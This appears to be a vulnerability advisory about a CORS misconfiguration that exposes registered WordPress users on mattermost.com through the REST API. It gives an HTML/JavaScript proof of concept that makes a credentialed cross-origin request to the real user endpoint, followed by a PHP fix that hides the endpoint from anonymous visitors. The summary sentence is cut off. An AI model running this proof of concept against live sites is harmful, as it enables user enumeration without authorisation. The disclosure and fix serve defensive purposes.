Mattermost: [mattermost.com] CORS Misconfiguration leakage of admin users
News category: Security vulnerabilities
Source: vulners.com
Summary: CORS policies on pages containing sensitive information should be reviewed to determine whether it is appropriate for the application to trust both the intentions and the security posture of any domain granted access. It is possible to obtain information about the registered users (such as id, name, login name, etc.) without authentication in WordPress via the REST API on

The vulnerability is registered as #772744 #356047 #591302 #138244 #329791

Platform(s) Affected: [website] https://mattermost.com/wp-json/wp/v2/users/

Proof of Concept:

```html
<html>
<body>
  <h2>CORS PoC</h2>
  <div id="demo">
    <button type="button" onclick="cors()">Exploit</button>
  </div>
  <script>
    function cors() {
      var xhr = new XMLHttpRequest();
      xhr.onreadystatechange = function () {
        // readyState 4 = request finished; 200 = the browser let the page read
        // the cross-origin response, so the user list is exposed to this origin.
        if (this.readyState == 4 && this.status == 200) {
          alert(this.responseText);
        }
      };
      xhr.open("GET", "https://mattermost.com/wp-json/wp/v2/users/", true);
      // Send cookies with the request; only readable if the server answers with a
      // matching Access-Control-Allow-Origin and Access-Control-Allow-Credentials: true.
      xhr.withCredentials = true;
      xhr.send();
    }
  </script>
</body>
</html>
```

Save the file as .html, open it in a browser and click Exploit.

Fix: the following code hides the users list (the endpoint returns 404) while the rest of the REST API keeps working as before.

```php
add_filter( 'rest_endpoints',... ...
```
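A complete version of the fix described above, written here as an added example (it is not the code from the original report or from Mattermost's site). It removes the two user routes from the WordPress REST API for anonymous visitors only, so logged-in editors and administrators keep the endpoint; the file location and plugin name are assumptions.

```php
<?php
/**
 * Plugin Name: Hide REST user enumeration
 * Description: Added example, not part of the original report. Removes the
 * /wp/v2/users routes from the REST API for anonymous requests, so that
 * GET /wp-json/wp/v2/users/ answers 404 (rest_no_route) while every other
 * route keeps working. Assumed location: wp-content/mu-plugins/hide-users.php
 */

add_filter( 'rest_endpoints', function ( array $endpoints ) {
    // Authenticated users (editors choosing an author, admins managing
    // accounts) still need the endpoint; only the anonymous listing leaks.
    // Current user is already resolved when WP_REST_Server builds its route table.
    if ( is_user_logged_in() ) {
        return $endpoints;
    }

    // Both the collection route and the single-user route expose id, name,
    // slug (the login name on most installs) and avatar URLs.
    $user_routes = array(
        '/wp/v2/users',
        '/wp/v2/users/(?P<id>[\d]+)',
    );
    foreach ( $user_routes as $route ) {
        unset( $endpoints[ $route ] );
    }

    return $endpoints;
} );
```

After activating it, an anonymous request to /wp-json/wp/v2/users/ returns the standard `rest_no_route` error with HTTP status 404, while /wp-json/wp/v2/posts and the other routes are unchanged. Note that this only closes the REST API path: WordPress also reveals user slugs through author archives and the `?author=N` redirect, which need separate handling if user enumeration is the concern.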